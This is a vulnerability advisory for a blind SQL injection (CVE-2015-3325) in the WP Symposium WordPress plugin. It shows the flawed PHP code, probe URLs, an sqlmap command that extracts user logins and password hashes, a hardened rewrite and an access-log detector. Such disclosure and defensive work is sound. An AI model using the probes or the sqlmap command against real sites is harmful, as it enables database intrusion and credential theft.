WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection

Published: 21 May 2015 00:00:00
Reported by: Hannes Trunde
Type: exploitdb
Source: www.exploit-db.com

SQL Injection in WordPress WP Symposium Plugin version 15.

Related
-------
Family          Title                                                                                        Published
CNVD            WordPress Plugin WP Symposium 'forum.php' SQL Injection Vulnerability                        20 May 2015 00:00
CVE             CVE-2015-3325                                                                                15 May 2015 18:00
Cvelist         CVE-2015-3325                                                                                15 May 2015 18:00
Dsquare         Wordpress WP Symposium 15.1 SQL Injection                                                    12 Jan 2016 00:00
EUVD            EUVD-2015-3371                                                                               7 Oct 2025 00:30
exploitpack     WordPress Plugin WP Symposium 15.1 - show SQL Injection                                      21 May 2015 00:00
NVD             CVE-2015-3325                                                                                15 May 2015 18:59
Packet Storm    WordPress WP Symposium 15.1 SQL Injection                                                    7 May 2015 00:00
Prion           Sql injection                                                                                15 May 2015 18:59
Tenable Nessus  WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection (Version Check)   18 May 2015 00:00
=======================================================================

              title: SQL Injection
            product: WordPress WP Symposium Plugin
 vulnerable version: 15.1 (and probably below)
      fixed version: 15.4
         CVE number: CVE-2015-3325
             impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
           homepage: https://wordpress.org/plugins/wp-symposium/
              found: 2015-02-07
                 by: Hannes Trunde
                     
               mail: [email protected]
            twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member 
directory, private mail, notification panel, chat windows, profile page, social 
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook 
Connect and Mobile support! You simply choose which you want to activate! 
Certain features are optional to members to protect their privacy."

Source: https://wordpress.org/plugins/wp-symposium/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed 
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind SQL injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.

forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
   $cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
   $topic_id = isset($_GET['show']) ? $_GET['show'] : 0;  // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================

forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
   if ($topic_id == 0) {
      $forum = __wps__getForum($cat_id);
      if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
      $html .= $forum;
   } else {
      $html .= __wps__getTopic($topic_id);	// __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
   }
}
===============================================================================

functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
   SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info 
   FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID 
   WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id);   //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================
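The three snippets above show the whole data path: the `show` query parameter is copied into `$topic_id` without any type check, handed to `__wps__getTopic()`, and concatenated into the `WHERE ... tid = ` clause. The following is an added example, not code from the plugin or from the advisory, of how the same lookup looks once the parameter is coerced to an integer at the trust boundary and the query is built with `$wpdb->prepare()`. It assumes it runs inside WordPress (so `$wpdb`, `$current_user`, `absint()` and `esc_html()` are available); `__wps__readTopicIdFromRequest()` and `__wps__getTopic_hardened()` are hypothetical names chosen for this example.

```php
<?php
// Added example, not the plugin's own code. Assumes a loaded WordPress
// environment: global $wpdb (class wpdb), global $current_user, and the
// helpers absint() / esc_html().

// Hardened equivalent of the forum.php assignment: the request value is
// reduced to a non-negative integer the moment it is read, so every later
// consumer (including __wps__getTopic) only ever sees an int.
function __wps__readTopicIdFromRequest() {
	return isset( $_GET['show'] ) ? absint( $_GET['show'] ) : 0;
}

// Hardened equivalent of the functions.php lookup.
function __wps__getTopic_hardened( $topic_id ) {
	global $wpdb, $current_user;

	// Defence in depth: even if a caller forgets the coercion above, refuse
	// anything that is not a string of digits >= 1 ("1 AND 1=0" is rejected here).
	if ( ! ctype_digit( (string) $topic_id ) || (int) $topic_id < 1 ) {
		return '';
	}
	$topic_id = absint( $topic_id );
	$owner_id = absint( $current_user->ID );

	// %d placeholders are bound by $wpdb->prepare(): the values are cast to
	// integers and substituted as numbers, never interpolated as SQL text.
	$sql = $wpdb->prepare(
		"SELECT tid, topic_subject, topic_approved, topic_category, topic_post,
		        topic_started, display_name, topic_sticky, topic_owner, for_info
		 FROM {$wpdb->prefix}symposium_topics t
		 INNER JOIN {$wpdb->base_prefix}users u ON t.topic_owner = u.ID
		 WHERE ( t.topic_approved = 'on' OR t.topic_owner = %d ) AND tid = %d",
		$owner_id,
		$topic_id
	);

	$post = $wpdb->get_row( $sql );
	if ( ! $post ) {
		return '';
	}

	// The original appends the row straight into $html; escape on output too.
	return '<h2>' . esc_html( $post->topic_subject ) . '</h2>';
}
```

Two points are worth keeping separate. The `absint()` at the read site is the actual fix for this report: a blind probe such as `1 AND 1=0` becomes the integer `1`, so the true and false variants return the same page and the oracle disappears. The `%d` binding in `prepare()` is the structural guarantee that survives future refactoring, because the query no longer depends on every caller remembering to validate.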


Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================

The following HTTP request to the forum page returns a blank page, thus 
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================

Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================
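The two probe requests above are also what a defender will see in the web server log: a request to the forum page whose `show` parameter is no longer a bare integer, typically in a true/false pair with different response sizes. The following added example, which is not part of the advisory, scans access-log lines for `show` or `cid` values that are not plain digits. The log lines, IP addresses and paths are constructed for this example; `wps_scan_log_line()` is a hypothetical name.

```php
<?php
// Added example, not from the advisory: a stand-alone CLI check that flags
// requests whose 'show' or 'cid' query parameter is not a plain integer,
// which is how the blind-injection probes look in a combined-format access log.
// The sample log lines below are constructed; hosts and paths are placeholders.

const WPS_INT_PARAMS = array( 'show', 'cid' );

// Returns one finding per suspicious parameter, or an empty array.
function wps_scan_log_line( string $line ): array {
	// Combined log format: the request line is the first quoted field.
	if ( ! preg_match( '/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m ) ) {
		return array();
	}
	$query = parse_url( $m[1], PHP_URL_QUERY );
	if ( $query === null || $query === false ) {
		return array();
	}
	parse_str( $query, $params );   // parse_str() URL-decodes the values

	$findings = array();
	foreach ( WPS_INT_PARAMS as $name ) {
		if ( ! isset( $params[ $name ] ) ) {
			continue;
		}
		$value = $params[ $name ];
		// Arrays (show[]=...) and anything with a non-digit character are flagged.
		if ( ! is_string( $value ) || ! ctype_digit( $value ) ) {
			$findings[] = sprintf(
				'param %s=%s is not an integer',
				$name,
				is_string( $value ) ? $value : json_encode( $value )
			);
		}
	}
	return $findings;
}

// Constructed sample: one legitimate request, the two probes from the advisory,
// and a request without the parameter at all.
$sample_log = array(
	'203.0.113.5 - - [21/May/2015:10:00:01 +0000] "GET /?page_id=4&cid=1&show=1 HTTP/1.1" 200 5120',
	'203.0.113.5 - - [21/May/2015:10:00:07 +0000] "GET /?page_id=4&cid=1&show=1%20AND%201%3D1 HTTP/1.1" 200 5120',
	'203.0.113.5 - - [21/May/2015:10:00:09 +0000] "GET /?page_id=4&cid=1&show=1%20AND%201%3D0 HTTP/1.1" 200 1033',
	'198.51.100.9 - - [21/May/2015:10:01:00 +0000] "GET /?page_id=4&cid=1 HTTP/1.1" 200 5120',
);

foreach ( $sample_log as $line ) {
	foreach ( wps_scan_log_line( $line ) as $finding ) {
		echo $finding, PHP_EOL;
	}
}
```

Only the second and third constructed lines produce findings. The response sizes in those two lines (5120 bytes for the true variant, 1033 for the false one) illustrate the oracle the advisory describes: the same client sending the same URL with only the boolean tail changed, and getting differently sized responses back, is a stronger signal than any single flagged parameter.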


Contact timeline:
-----------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
            list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
            available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
            should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory.

Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
See solution.

Vulners scores (21 May 2015 00:00, current):
  Vulners AI Score: 6.5 (medium risk)
  CVSS 2:           7.5
  EPSS:             0.019
  Views:            41